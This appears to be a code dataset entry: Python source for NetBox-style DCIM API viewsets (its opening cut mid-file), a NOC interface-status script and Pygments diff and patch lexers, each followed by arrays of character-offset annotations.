queryset = Region.objects.annotate(
site_count=Count('sites')
)
serializer_class = serializers.RegionSerializer
filterset_class = filters.RegionFilterSet
#
# Sites
#
class SiteViewSet(CustomFieldModelViewSet):
queryset = Site.objects.prefetch_related(
'region', 'tenant', 'tags'
).annotate(
device_count=get_subquery(Device, 'site'),
rack_count=get_subquery(Rack, 'site'),
prefix_count=get_subquery(Prefix, 'site'),
vlan_count=get_subquery(VLAN, 'site'),
circuit_count=get_subquery(Circuit, 'terminations__site'),
virtualmachine_count=get_subquery(VirtualMachine, 'cluster__site'),
)
serializer_class = serializers.SiteSerializer
filterset_class = filters.SiteFilterSet
@action(detail=True)
def graphs(self, request, pk):
"""
A convenience method for rendering graphs for a particular site.
"""
site = get_object_or_404(Site, pk=pk)
queryset = Graph.objects.filter(type__model='site')
serializer = RenderedGraphSerializer(queryset, many=True, context={'graphed_object': site})
return Response(serializer.data)
#
# Rack groups
#
class RackGroupViewSet(ModelViewSet):
queryset = RackGroup.objects.prefetch_related('site').annotate(
rack_count=Count('racks')
)
serializer_class = serializers.RackGroupSerializer
filterset_class = filters.RackGroupFilterSet
#
# Rack roles
#
class RackRoleViewSet(ModelViewSet):
queryset = RackRole.objects.annotate(
rack_count=Count('racks')
)
serializer_class = serializers.RackRoleSerializer
filterset_class = filters.RackRoleFilterSet
#
# Racks
#
class RackViewSet(CustomFieldModelViewSet):
queryset = Rack.objects.prefetch_related(
'site', 'group__site', 'role', 'tenant', 'tags'
).annotate(
device_count=get_subquery(Device, 'rack'),
powerfeed_count=get_subquery(PowerFeed, 'rack')
)
serializer_class = serializers.RackSerializer
filterset_class = filters.RackFilterSet
@swagger_auto_schema(
responses={200: serializers.RackUnitSerializer(many=True)},
query_serializer=serializers.RackElevationDetailFilterSerializer
)
@action(detail=True)
def elevation(self, request, pk=None):
"""
Rack elevation representing the list of rack units. Also supports rendering the elevation as an SVG.
"""
rack = get_object_or_404(Rack, pk=pk)
serializer = serializers.RackElevationDetailFilterSerializer(data=request.GET)
if not serializer.is_valid():
return Response(serializer.errors, 400)
data = serializer.validated_data
if data['render'] == 'svg':
# Render and return the elevation as an SVG drawing with the correct content type
drawing = rack.get_elevation_svg(
face=data['face'],
unit_width=data['unit_width'],
unit_height=data['unit_height'],
legend_width=data['legend_width'],
include_images=data['include_images'],
base_url=request.build_absolute_uri('/')
)
return HttpResponse(drawing.tostring(), content_type='image/svg+xml')
else:
# Return a JSON representation of the rack units in the elevation
elevation = rack.get_rack_units(
face=data['face'],
exclude=data['exclude'],
expand_devices=data['expand_devices']
)
# Enable filtering rack units by ID or name
q = data['q']
if q:
elevation = [u for u in elevation if q in str(u['id']) or q in str(u['name'])]
page = self.paginate_queryset(elevation)
if page is not None:
rack_units = serializers.RackUnitSerializer(page, many=True, context={'request': request})
return self.get_paginated_response(rack_units.data)
#
# Rack reservations
#
class RackReservationViewSet(ModelViewSet):
queryset = RackReservation.objects.prefetch_related('rack', 'user', 'tenant')
serializer_class = serializers.RackReservationSerializer
filterset_class = filters.RackReservationFilterSet
# Assign user from request
def perform_create(self, serializer):
serializer.save(user=self.request.user)
#
# Manufacturers
#
class ManufacturerViewSet(ModelViewSet):
queryset = Manufacturer.objects.annotate(
devicetype_count=get_subquery(DeviceType, 'manufacturer'),
inventoryitem_count=get_subquery(InventoryItem, 'manufacturer'),
platform_count=get_subquery(Platform, 'manufacturer')
)
serializer_class = serializers.ManufacturerSerializer
filterset_class = filters.ManufacturerFilterSet
#
# Device types
#
class DeviceTypeViewSet(CustomFieldModelViewSet):
queryset = DeviceType.objects.prefetch_related('manufacturer').prefetch_related('tags').annotate(
device_count=Count('instances')
)
serializer_class = serializers.DeviceTypeSerializer
filterset_class = filters.DeviceTypeFilterSet
#
# Device type components
#
class ConsolePortTemplateViewSet(ModelViewSet):
queryset = ConsolePortTemplate.objects.prefetch_related('device_type__manufacturer')
serializer_class = serializers.ConsolePortTemplateSerializer
filterset_class = filters.ConsolePortTemplateFilterSet
class ConsoleServerPortTemplateViewSet(ModelViewSet):
queryset = ConsoleServerPortTemplate.objects.prefetch_related('device_type__manufacturer')
serializer_class = serializers.ConsoleServerPortTemplateSerializer
filterset_class = filters.ConsoleServerPortTemplateFilterSet
class PowerPortTemplateViewSet(ModelViewSet):
queryset = PowerPortTemplate.objects.prefetch_related('device_type__manufacturer')
serializer_class = serializers.PowerPortTemplateSerializer
filterset_class = filters.PowerPortTemplateFilterSet
class PowerOutletTemplateViewSet(ModelViewSet):
queryset = PowerOutletTemplate.objects.prefetch_related('device_type__manufacturer')
serializer_class = serializers.PowerOutletTemplateSerializer
filterset_class = filters.PowerOutletTemplateFilterSet
class InterfaceTemplateViewSet(ModelViewSet):
queryset = InterfaceTemplate.objects.prefetch_related('device_type__manufacturer')
serializer_class = serializers.InterfaceTemplateSerializer
filterset_class = filters.InterfaceTemplateFilterSet
class FrontPortTemplateViewSet(ModelViewSet):
queryset = FrontPortTemplate.objects.prefetch_related('device_type__manufacturer')
serializer_class = serializers.FrontPortTemplateSerializer
filterset_class = filters.FrontPortTemplateFilterSet
class RearPortTemplateViewSet(ModelViewSet):
queryset = RearPortTemplate.objects.prefetch_related('device_type__manufacturer')
serializer_class = serializers.RearPortTemplateSerializer
filterset_class = filters.RearPortTemplateFilterSet
class DeviceBayTemplateViewSet(ModelViewSet):
queryset = DeviceBayTemplate.objects.prefetch_related('device_type__manufacturer')
serializer_class = serializers.DeviceBayTemplateSerializer
filterset_class = filters.DeviceBayTemplateFilterSet
#
# Device roles
#
class DeviceRoleViewSet(ModelViewSet):
queryset = DeviceRole.objects.annotate(
device_count=get_subquery(Device, 'device_role'),
virtualmachine_count=get_subquery(VirtualMachine, 'role')
)
serializer_class = serializers.DeviceRoleSerializer
filterset_class = filters.DeviceRoleFilterSet
#
# Platforms
#
class PlatformViewSet(ModelViewSet):
queryset = Platform.objects.annotate(
device_count=get_subquery(Device, 'platform'),
virtualmachine_count=get_subquery(VirtualMachine, 'platform')
)
serializer_class = serializers.PlatformSerializer
filterset_class = filters.PlatformFilterSet
#
# Devices
#
class DeviceViewSet(CustomFieldModelViewSet):
queryset = Device.objects.prefetch_related(
'device_type__manufacturer', 'device_role', 'tenant', 'platform', 'site', 'rack', 'parent_bay',
'virtual_chassis__master', 'primary_ip4__nat_outside', 'primary_ip6__nat_outside', 'tags',
)
filterset_class = filters.DeviceFilterSet
def get_serializer_class(self):
"""
Select the specific serializer based on the request context.
If the `brief` query param equates to True, return the NestedDeviceSerializer
If the `exclude` query param includes `config_context` as a value, return the DeviceSerializer
Else, return the DeviceWithConfigContextSerializer
"""
request = self.get_serializer_context()['request']
if request.query_params.get('brief', False):
return serializers.NestedDeviceSerializer
elif 'config_context' in request.query_params.get('exclude', []):
return serializers.DeviceSerializer
return serializers.DeviceWithConfigContextSerializer
@action(detail=True)
def graphs(self, request, pk):
"""
A convenience method for rendering graphs for a particular Device.
"""
device = get_object_or_404(Device, pk=pk)
queryset = Graph.objects.filter(type__model='device')
serializer = RenderedGraphSerializer(queryset, many=True, context={'graphed_object': device})
return Response(serializer.data)
@swagger_auto_schema(
manual_parameters=[
Parameter(
name='method',
in_='query',
required=True,
type=openapi.TYPE_STRING
)
],
responses={'200': serializers.DeviceNAPALMSerializer}
)
@action(detail=True, url_path='napalm')
def napalm(self, request, pk):
"""
Execute a NAPALM method on a Device
"""
device = get_object_or_404(Device, pk=pk)
if not device.primary_ip:
raise ServiceUnavailable("This device does not have a primary IP address configured.")
if device.platform is None:
raise ServiceUnavailable("No platform is configured for this device.")
if not device.platform.napalm_driver:
raise ServiceUnavailable("No NAPALM driver is configured for this device's platform ().".format(
device.platform
))
# Check that NAPALM is installed
try:
import napalm
from napalm.base.exceptions import ModuleImportError
except ImportError:
raise ServiceUnavailable("NAPALM is not installed. Please see the documentation for instructions.")
# Validate the configured driver
try:
driver = napalm.get_network_driver(device.platform.napalm_driver)
except ModuleImportError:
raise ServiceUnavailable("NAPALM driver for platform {} not found: {}.".format(
device.platform, device.platform.napalm_driver
))
# Verify user permission
if not request.user.has_perm('dcim.napalm_read'):
return HttpResponseForbidden()
# Gather NAPALM connection parameters for the device
napalm_methods = request.GET.getlist('method')
response = OrderedDict([(m, None) for m in napalm_methods])
ip_address = str(device.primary_ip.address.ip)
username = settings.NAPALM_USERNAME
password = settings.NAPALM_PASSWORD
optional_args = settings.NAPALM_ARGS.copy()
if device.platform.napalm_args is not None:
optional_args.update(device.platform.napalm_args)
# Update NAPALM parameters according to the request headers
for header in request.headers:
if header[:9].lower() != 'x-napalm-':
continue
key = header[9:]
if key.lower() == 'username':
username = request.headers[header]
elif key.lower() == 'password':
password = request.headers[header]
elif key:
optional_args[key.lower()] = request.headers[header]
d = driver(
hostname=ip_address,
username=username,
password=password,
timeout=settings.NAPALM_TIMEOUT,
optional_args=optional_args
)
try:
d.open()
except Exception as e:
raise ServiceUnavailable("Error connecting to the device at {}: {}".format(ip_address, e))
# Validate and execute each specified NAPALM method
for method in napalm_methods:
if not hasattr(driver, method):
response[method] = {'error': 'Unknown NAPALM method'}
continue
if not method.startswith('get_'):
response[method] = {'error': 'Only get_* NAPALM methods are supported'}
continue
try:
response[method] = getattr(d, method)()
except NotImplementedError:
response[method] = {'error': 'Method {} not implemented for NAPALM driver {}'.format(method, driver)}
except Exception as e:
response[method] = {'error': 'Method {} failed: {}'.format(method, e)}
d.close()
return Response(response)
#
# Device components
#
class ConsolePortViewSet(CableTraceMixin, ModelViewSet):
queryset = ConsolePort.objects.prefetch_related('device', 'connected_endpoint__device', 'cable', 'tags')
serializer_class = serializers.ConsolePortSerializer
filterset_class = filters.ConsolePortFilterSet
class ConsoleServerPortViewSet(CableTraceMixin, ModelViewSet):
queryset = ConsoleServerPort.objects.prefetch_related('device', 'connected_endpoint__device', 'cable', 'tags')
serializer_class = serializers.ConsoleServerPortSerializer
filterset_class = filters.ConsoleServerPortFilterSet
class PowerPortViewSet(CableTraceMixin, ModelViewSet):
queryset = PowerPort.objects.prefetch_related(
'device', '_connected_poweroutlet__device', '_connected_powerfeed', 'cable', 'tags'
)
serializer_class = serializers.PowerPortSerializer
filterset_class = filters.PowerPortFilterSet
class PowerOutletViewSet(CableTraceMixin, ModelViewSet):
queryset = PowerOutlet.objects.prefetch_related('device', 'connected_endpoint__device', 'cable', 'tags')
serializer_class = serializers.PowerOutletSerializer
filterset_class = filters.PowerOutletFilterSet
class InterfaceViewSet(CableTraceMixin, ModelViewSet):
queryset = Interface.objects.prefetch_related(
'device', '_connected_interface', '_connected_circuittermination', 'cable', 'ip_addresses', 'tags'
).filter(
device__isnull=False
)
serializer_class = serializers.InterfaceSerializer
filterset_class = filters.InterfaceFilterSet
@action(detail=True)
def graphs(self, request, pk):
"""
A convenience method for rendering graphs for a particular interface.
"""
interface = get_object_or_404(Interface, pk=pk)
queryset = Graph.objects.filter(type__model='interface')
serializer = RenderedGraphSerializer(queryset, many=True, context={'graphed_object': interface})
return Response(serializer.data)
class FrontPortViewSet(CableTraceMixin, ModelViewSet):
queryset = FrontPort.objects.prefetch_related('device__device_type__manufacturer', 'rear_port', 'cable', 'tags')
serializer_class = serializers.FrontPortSerializer
filterset_class = filters.FrontPortFilterSet
class RearPortViewSet(CableTraceMixin, ModelViewSet):
queryset = RearPort.objects.prefetch_related('device__device_type__manufacturer', 'cable', 'tags')
serializer_class = serializers.RearPortSerializer
filterset_class = filters.RearPortFilterSet
class DeviceBayViewSet(ModelViewSet):
queryset = DeviceBay.objects.prefetch_related('installed_device').prefetch_related('tags')
serializer_class = serializers.DeviceBaySerializer
filterset_class = filters.DeviceBayFilterSet
class InventoryItemViewSet(ModelViewSet):
queryset = InventoryItem.objects.prefetch_related('device', 'manufacturer').prefetch_related('tags')
serializer_class = serializers.InventoryItemSerializer
filterset_class = filters.InventoryItemFilterSet
#
# Connections
#
class ConsoleConnectionViewSet(ListModelMixin, GenericViewSet):
queryset = ConsolePort.objects.prefetch_related(
'device', 'connected_endpoint__device'
).filter(
connected_endpoint__isnull=False
)
serializer_class = serializers.ConsolePortSerializer
filterset_class = filters.ConsoleConnectionFilterSet
class PowerConnectionViewSet(ListModelMixin, GenericViewSet):
queryset = PowerPort.objects.prefetch_related(
'device', 'connected_endpoint__device'
).filter(
_connected_poweroutlet__isnull=False
)
serializer_class = serializers.PowerPortSerializer
filterset_class = filters.PowerConnectionFilterSet
class InterfaceConnectionViewSet(ListModelMixin, GenericViewSet):
queryset = Interface.objects.prefetch_related(
'device', '_connected_interface__device'
).filter(
# Avoid duplicate connections by only selecting the lower PK in a connected pair
_connected_interface__isnull=False,
pk__lt=F('_connected_interface')
)
serializer_class = serializers.InterfaceConnectionSerializer
filterset_class = filters.InterfaceConnectionFilterSet
#
# Cables
#
class CableViewSet(ModelViewSet):
queryset = Cable.objects.prefetch_related(
'termination_a', 'termination_b'
)
serializer_class = serializers.CableSerializer
filterset_class = filters.CableFilterSet
#
# Virtual chassis
#
class VirtualChassisViewSet(ModelViewSet):
queryset = VirtualChassis.objects.prefetch_related('tags').annotate(
member_count=Count('members')
)
serializer_class = serializers.VirtualChassisSerializer
filterset_class = filters.VirtualChassisFilterSet
#
# Power panels
#
class PowerPanelViewSet(ModelViewSet):
queryset = PowerPanel.objects.prefetch_related(
'site', 'rack_group'
).annotate(
powerfeed_count=Count('powerfeeds')
)
serializer_class = serializers.PowerPanelSerializer
filterset_class = filters.PowerPanelFilterSet
#
# Power feeds
#
class PowerFeedViewSet(CustomFieldModelViewSet):
queryset = PowerFeed.objects.prefetch_related('power_panel', 'rack', 'tags')
serializer_class = serializers.PowerFeedSerializer
filterset_class = filters.PowerFeedFilterSet
#
# Miscellaneous
#
class ConnectedDeviceViewSet(ViewSet):
"""
This endpoint allows a user to determine what device (if any) is connected to a given peer device and peer
interface. This is useful in a situation where a device boots with no configuration, but can detect its neighbors
via a protocol such as LLDP. Two query parameters must be included in the request:
* `peer_device`: The name of the peer device
* `peer_interface`: The name of the peer interface
"""
permission_classes = [IsAuthenticatedOrLoginNotRequired]
_device_param = Parameter(
name='peer_device',
in_='query',
description='The name of the peer device',
required=True,
type=openapi.TYPE_STRING
)
_interface_param = Parameter(
name='peer_interface',
in_='query',
description='The name of the peer interface',
required=True,
type=openapi.TYPE_STRING
)
def get_view_name(self):
return "Connected Device Locator"
@swagger_auto_schema(
manual_parameters=[_device_param, _interface_param],
responses={'200': serializers.DeviceSerializer}
)
def list(self, request):
peer_device_name = request.query_params.get(self._device_param.name)
peer_interface_name = request.query_params.get(self._interface_param.name)
if not peer_device_name or not peer_interface_name:
raise MissingFilterException(detail='Request must include "peer_device" and "peer_interface" filters.')
# Determine local interface from peer interface's connection
peer_interface = get_object_or_404(Interface, device__name=peer_device_name, name=peer_interface_name)
local_interface = peer_interface._connected_interface
if local_interface is None:
return Response()
return Response(serializers.DeviceSerializer(local_interface.device, context={'request': request}).data)
| [
[
[
24,
35
],
[
13978,
13989
]
],
[
[
61,
69
],
[
14101,
14109
],
[
14145,
14153
],
[
14194,
14202
],
[
14964,
14972
]
],
[
[
99,
104
],
[
2760,
2765
],
[
4025,
4030
],
[
4268,
4273
],
[
7727,
7732
],
[
20619,
20624
],
[
20938,
20943
]
],
[
[
106,
107
],
[
20061,
20062
]
],
[
[
132,
153
],
[
13847,
13868
]
],
[
[
155,
167
],
[
5918,
5930
]
],
[
[
197,
214
],
[
1823,
1840
],
[
3647,
3664
],
[
5165,
5182
],
[
11920,
11937
],
[
12626,
12643
],
[
17748,
17765
],
[
22964,
22981
]
],
[
[
236,
243
],
[
12349,
12356
],
[
22052,
22059
],
[
22254,
22261
]
],
[
[
273,
282
],
[
12226,
12235
],
[
21905,
21914
],
[
22101,
22110
]
],
[
[
310,
329
],
[
4781,
4800
],
[
12165,
12184
],
[
22358,
22377
]
],
[
[
368,
374
],
[
1598,
1604
],
[
3480,
3486
],
[
4954,
4960
],
[
11749,
11755
],
[
12467,
12473
],
[
17571,
17577
]
],
[
[
409,
423
],
[
19086,
19100
],
[
19425,
19439
],
[
19766,
19780
]
],
[
[
460,
468
],
[
2634,
2642
],
[
3853,
3861
],
[
5340,
5348
],
[
12133,
12141
],
[
15991,
15999
],
[
17969,
17977
],
[
23168,
23176
],
[
23195,
23203
]
],
[
[
505,
519
],
[
19102,
19116
],
[
19441,
19455
],
[
19782,
19796
]
],
[
[
521,
528
],
[
21377,
21384
]
],
[
[
558,
565
],
[
3266,
3273
]
],
[
[
583,
590
],
[
2855,
2862
],
[
3452,
3459
],
[
4123,
4130
],
[
4365,
4372
],
[
4753,
4760
],
[
6949,
6956
],
[
7502,
7509
],
[
7830,
7837
],
[
8114,
8121
],
[
8395,
8402
],
[
8658,
8665
],
[
8919,
8926
],
[
9176,
9183
],
[
9431,
9438
],
[
9683,
9690
],
[
9937,
9944
],
[
10285,
10292
],
[
10618,
10625
],
[
10986,
10993
],
[
16282,
16289
],
[
16576,
16583
],
[
16894,
16901
],
[
17168,
17175
],
[
17538,
17545
],
[
18246,
18253
],
[
18508,
18515
],
[
18746,
18753
],
[
19003,
19010
],
[
19359,
19366
],
[
19698,
19705
],
[
20180,
20187
],
[
20434,
20441
],
[
20724,
20731
],
[
21042,
21049
],
[
21298,
21305
]
],
[
[
621,
626
],
[
20282,
20287
]
],
[
[
628,
639
],
[
16109,
16120
],
[
19134,
19145
]
],
[
[
641,
660
],
[
7953,
7972
]
],
[
[
662,
679
],
[
16391,
16408
]
],
[
[
681,
706
],
[
8222,
8247
]
],
[
[
708,
714
],
[
3069,
3075
],
[
4602,
4608
],
[
10111,
10117
],
[
10445,
10451
],
[
10722,
10728
],
[
11938,
11944
],
[
12644,
12650
]
],
[
[
716,
725
],
[
18589,
18598
]
],
[
[
731,
748
],
[
9780,
9797
]
],
[
[
750,
760
],
[
10048,
10058
]
],
[
[
762,
772
],
[
7252,
7262
],
[
7619,
7629
]
],
[
[
774,
783
],
[
18067,
18076
]
],
[
[
785,
802
],
[
9274,
9291
]
],
[
[
804,
813
],
[
17269,
17278
],
[
19814,
19823
],
[
17766,
17775
],
[
22982,
22991
]
],
[
[
815,
832
],
[
9019,
9036
]
],
[
[
838,
850
],
[
7183,
7195
]
],
[
[
852,
865
],
[
7322,
7335
],
[
18832,
18845
]
],
[
[
867,
875
],
[
7390,
7398
],
[
10384,
10392
]
],
[
[
877,
886
],
[
4656,
4665
],
[
21155,
21164
]
],
[
[
888,
899
],
[
16995,
17006
]
],
[
[
901,
920
],
[
8758,
8777
]
],
[
[
922,
932
],
[
20832,
20842
]
],
[
[
934,
943
],
[
16683,
16692
],
[
19473,
19482
]
],
[
[
949,
966
],
[
8501,
8518
]
],
[
[
968,
972
],
[
3118,
3122
],
[
4465,
4469
],
[
5183,
5187
]
],
[
[
974,
983
],
[
3953,
3962
]
],
[
[
985,
1000
],
[
6799,
6814
]
],
[
[
1002,
1010
],
[
4222,
4230
]
],
[
[
1012,
1020
],
[
18344,
18352
]
],
[
[
1022,
1038
],
[
9528,
9544
]
],
[
[
1040,
1046
],
[
2716,
2722
]
],
[
[
1048,
1052
],
[
2953,
2957
],
[
3665,
3669
]
],
[
[
1058,
1072
],
[
20540,
20554
]
],
[
[
1111,
1134
],
[
3759,
3782
],
[
12036,
12059
],
[
17870,
17893
]
],
[
[
1164,
1187
],
[
2912,
2935
],
[
4424,
4447
],
[
7578,
7601
],
[
10681,
10704
],
[
21114,
21137
]
],
[
[
1214,
1219
],
[
3697,
3702
],
[
11972,
11977
],
[
17803,
17808
]
],
[
[
1244,
1250
],
[
3167,
3173
]
],
[
[
1252,
1256
],
[
3216,
3220
]
],
[
[
1289,
1313
],
[
2045,
2069
],
[
2411,
2435
]
],
[
[
1315,
1348
],
[
21850,
21883
]
],
[
[
1350,
1362
],
[
2686,
2698
],
[
3923,
3935
],
[
4192,
4204
],
[
6769,
6781
],
[
7153,
7165
],
[
7923,
7935
],
[
8192,
8204
],
[
8471,
8483
],
[
8728,
8740
],
[
8989,
9001
],
[
9244,
9256
],
[
9498,
9510
],
[
9750,
9762
],
[
10018,
10030
],
[
10354,
10366
],
[
16079,
16091
],
[
16361,
16373
],
[
16653,
16665
],
[
16965,
16977
],
[
17239,
17251
],
[
18037,
18049
],
[
18314,
18326
],
[
18559,
18571
],
[
18802,
18814
],
[
20252,
20264
],
[
20510,
20522
],
[
20802,
20814
]
],
[
[
1364,
1382
],
[
12711,
12729
],
[
12846,
12864
],
[
12975,
12993
],
[
13305,
13323
],
[
13584,
13602
],
[
15122,
15140
]
],
[
[
1414,
1426
],
[
3056,
3068
],
[
3105,
3117
],
[
3154,
3166
],
[
3203,
3215
],
[
3253,
3265
],
[
3327,
3339
],
[
4589,
4601
],
[
4643,
4655
],
[
7239,
7251
],
[
7309,
7321
],
[
7377,
7389
],
[
10098,
10110
],
[
10164,
10176
],
[
10432,
10444
],
[
10495,
10507
]
],
[
[
1461,
1475
],
[
3340,
3354
],
[
10177,
10191
],
[
10508,
10522
]
],
[
[
1490,
1501
],
[
2804,
2815
],
[
3403,
3414
],
[
4069,
4080
],
[
4312,
4323
],
[
4704,
4715
],
[
4826,
4837
],
[
4895,
4906
],
[
6889,
6900
],
[
7445,
7456
],
[
7775,
7786
],
[
8050,
8061
],
[
8325,
8336
],
[
8596,
8607
],
[
8855,
8866
],
[
9114,
9125
],
[
9369,
9380
],
[
9622,
9633
],
[
9875,
9886
],
[
10230,
10241
],
[
10565,
10576
],
[
12420,
12431
],
[
16226,
16237
],
[
16514,
16525
],
[
16840,
16851
],
[
17112,
17123
],
[
17484,
17495
],
[
18192,
18203
],
[
18455,
18466
],
[
18692,
18703
],
[
18945,
18956
],
[
19303,
19314
],
[
19644,
19655
],
[
20116,
20127
],
[
20384,
20395
],
[
20665,
20676
],
[
20987,
20998
],
[
21244,
21255
],
[
22466,
22477
],
[
2225,
2236
],
[
5217,
5228
],
[
6567,
6578
],
[
11523,
11534
],
[
11652,
11663
],
[
11697,
11708
],
[
23204,
23215
]
],
[
[
1526,
1548
],
[
22771,
22793
]
],
[
[
1567,
1582
],
[
16062,
16077
],
[
16344,
16359
],
[
16636,
16651
],
[
16948,
16963
],
[
17222,
17237
],
[
18020,
18035
],
[
18297,
18312
]
],
[
[
2672,
2685
]
],
[
[
2900,
2911
]
],
[
[
3906,
3922
]
],
[
[
4176,
4191
]
],
[
[
4412,
4423
]
],
[
[
6746,
6768
]
],
[
[
7133,
7152
]
],
[
[
7560,
7577
]
],
[
[
7896,
7922
]
],
[
[
8159,
8191
]
],
[
[
8446,
8470
]
],
[
[
8701,
8727
]
],
[
[
8964,
8988
]
],
[
[
9219,
9243
]
],
[
[
9474,
9497
]
],
[
[
9725,
9749
]
],
[
[
10000,
10017
]
],
[
[
10338,
10353
]
],
[
[
10667,
10680
]
],
[
[
16043,
16061
]
],
[
[
16319,
16343
]
],
[
[
16619,
16635
]
],
[
[
16929,
16947
]
],
[
[
17205,
17221
]
],
[
[
18003,
18019
]
],
[
[
18281,
18296
]
],
[
[
18542,
18558
]
],
[
[
18781,
18801
]
],
[
[
19061,
19085
]
],
[
[
19402,
19424
]
],
[
[
19739,
19765
]
],
[
[
20239,
20251
]
],
[
[
20488,
20509
]
],
[
[
20784,
20801
]
],
[
[
21097,
21113
]
],
[
[
21354,
21376
]
]
] |
# ---------------------------------------------------------------------
# Angtel.Topaz.get_interface_status
# ---------------------------------------------------------------------
# Copyright (C) 2007-2019 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# Python modules
import re
# NOC modules
from noc.core.script.base import BaseScript
from noc.sa.interfaces.igetinterfacestatus import IGetInterfaceStatus
class Script(BaseScript):
name = "Angtel.Topaz.get_interface_status"
interface = IGetInterfaceStatus
cache = True
rx_port = re.compile(
r"^(?P<port>(?:Fa|Gi|Te|Po)\S+)\s+\S+\s+\S+\s+\S+\s+\S+\s+\S+\s+"
r"(?P<oper_status>Up|Down|Not Present)",
re.MULTILINE | re.IGNORECASE,
)
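# Illustrative parse (fabricated output line; real "show interfaces status"
# column contents vary by platform):
#     m = Script.rx_port.search("gi1/0/1 1G-Copper Full 1000 Enabled Off Disabled Up")
#     m.group("port")        -> "gi1/0/1"
#     m.group("oper_status") -> "Up"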
def execute_cli(self, interface=None):
r = []
v = self.cli("show interfaces status", cached=True)
for match in self.rx_port.finditer(v):
if (interface is not None) and (interface == match.group("port")):
return [
{"interface": match.group("port"), "status": match.group("oper_status") == "Up"}
]
r += [{"interface": match.group("port"), "status": match.group("oper_status") == "Up"}]
return r
| [
[
[
345,
347
],
[
620,
622
],
[
763,
765
],
[
778,
780
]
],
[
[
396,
406
],
[
492,
502
]
],
[
[
457,
476
],
[
568,
587
]
],
[
[
485,
491
]
]
] |
# -*- coding: utf-8 -*-
"""
pygments.lexers.diff
~~~~~~~~~~~~~~~~~~~~
Lexers for diff/patch formats.
:copyright: Copyright 2006-2017 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import RegexLexer, include, bygroups
from pygments.token import Text, Comment, Operator, Keyword, Name, Generic, \
Literal
__all__ = ['DiffLexer', 'DarcsPatchLexer', 'WDiffLexer']
class DiffLexer(RegexLexer):
"""
Lexer for unified or context-style diffs or patches.
"""
name = 'Diff'
aliases = ['diff', 'udiff']
filenames = ['*.diff', '*.patch']
mimetypes = ['text/x-diff', 'text/x-patch']
tokens = {
'root': [
(r' .*\n', Text),
(r'\+.*\n', Generic.Inserted),
(r'-.*\n', Generic.Deleted),
(r'!.*\n', Generic.Strong),
(r'@.*\n', Generic.Subheading),
(r'([Ii]ndex|diff).*\n', Generic.Heading),
(r'=.*\n', Generic.Heading),
(r'.*\n', Text),
]
}
def analyse_text(text):
if text[:7] == 'Index: ':
return True
if text[:5] == 'diff ':
return True
if text[:4] == '--- ':
return 0.9
class DarcsPatchLexer(RegexLexer):
"""
DarcsPatchLexer is a lexer for the various versions of the darcs patch
format. Examples of this format are derived by commands such as
``darcs annotate --patch`` and ``darcs send``.
.. versionadded:: 0.10
"""
name = 'Darcs Patch'
aliases = ['dpatch']
filenames = ['*.dpatch', '*.darcspatch']
DPATCH_KEYWORDS = ('hunk', 'addfile', 'adddir', 'rmfile', 'rmdir', 'move',
'replace')
tokens = {
'root': [
(r'<', Operator),
(r'>', Operator),
(r'\{', Operator),
(r'\}', Operator),
(r'(\[)((?:TAG )?)(.*)(\n)(.*)(\*\*)(\d+)(\s?)(\])',
bygroups(Operator, Keyword, Name, Text, Name, Operator,
Literal.Date, Text, Operator)),
(r'(\[)((?:TAG )?)(.*)(\n)(.*)(\*\*)(\d+)(\s?)',
bygroups(Operator, Keyword, Name, Text, Name, Operator,
Literal.Date, Text), 'comment'),
(r'New patches:', Generic.Heading),
(r'Context:', Generic.Heading),
(r'Patch bundle hash:', Generic.Heading),
(r'(\s*)(%s)(.*\n)' % '|'.join(DPATCH_KEYWORDS),
bygroups(Text, Keyword, Text)),
(r'\+', Generic.Inserted, "insert"),
(r'-', Generic.Deleted, "delete"),
(r'.*\n', Text),
],
'comment': [
(r'[^\]].*\n', Comment),
(r'\]', Operator, "#pop"),
],
'specialText': [ # darcs add [_CODE_] special operators for clarity
(r'\n', Text, "#pop"), # line-based
(r'\[_[^_]*_]', Operator),
],
'insert': [
include('specialText'),
(r'\[', Generic.Inserted),
(r'[^\n\[]+', Generic.Inserted),
],
'delete': [
include('specialText'),
(r'\[', Generic.Deleted),
(r'[^\n\[]+', Generic.Deleted),
],
}
class WDiffLexer(RegexLexer):
"""
A `wdiff <https://www.gnu.org/software/wdiff/>`_ lexer.
Note that:
* only normal wdiff output (i.e. without options such as -l) is supported.
* if the compared files themselves contain "[-", "-]", "{+" or "+}",
especially when unbalanced, this lexer can get confused.
.. versionadded:: 2.2
"""
name = 'WDiff'
aliases = ['wdiff']
filenames = ['*.wdiff']
mimetypes = []
flags = re.MULTILINE | re.DOTALL
# We can only assume "[-" after "[-" before "-]" is `nested`,
# for instance wdiff to wdiff outputs. We have no way to
# distinct these marker is of wdiff output from original text.
ins_op = r"\{\+"
ins_cl = r"\+\}"
del_op = r"\[\-"
del_cl = r"\-\]"
normal = r'[^{}[\]+-]+' # for performance
tokens = {
'root': [
(ins_op, Generic.Inserted, 'inserted'),
(del_op, Generic.Deleted, 'deleted'),
(normal, Text),
(r'.', Text),
],
'inserted': [
(ins_op, Generic.Inserted, '#push'),
(del_op, Generic.Inserted, '#push'),
(del_cl, Generic.Inserted, '#pop'),
(ins_cl, Generic.Inserted, '#pop'),
(normal, Generic.Inserted),
(r'.', Generic.Inserted),
],
'deleted': [
(del_op, Generic.Deleted, '#push'),
(ins_op, Generic.Deleted, '#push'),
(ins_cl, Generic.Deleted, '#pop'),
(del_cl, Generic.Deleted, '#pop'),
(normal, Generic.Deleted),
(r'.', Generic.Deleted),
],
}
| [
[
[
242,
244
],
[
3710,
3712
],
[
3725,
3727
]
],
[
[
273,
283
],
[
469,
479
],
[
1286,
1296
],
[
3287,
3297
]
],
[
[
285,
292
],
[
2994,
3001
],
[
3145,
3152
]
],
[
[
294,
302
],
[
1982,
1990
],
[
2166,
2174
],
[
2500,
2508
]
],
[
[
330,
334
],
[
749,
753
],
[
1042,
1046
],
[
2016,
2020
],
[
2074,
2078
],
[
2200,
2204
],
[
2258,
2262
],
[
2509,
2513
],
[
2524,
2528
],
[
2650,
2654
],
[
2883,
2887
],
[
4218,
4222
],
[
4244,
4248
]
],
[
[
336,
343
],
[
2716,
2723
]
],
[
[
345,
353
],
[
1801,
1809
],
[
1831,
1839
],
[
1862,
1870
],
[
1893,
1901
],
[
1991,
1999
],
[
2028,
2036
],
[
2080,
2088
],
[
2175,
2183
],
[
2212,
2220
],
[
2746,
2754
],
[
2940,
2948
]
],
[
[
355,
362
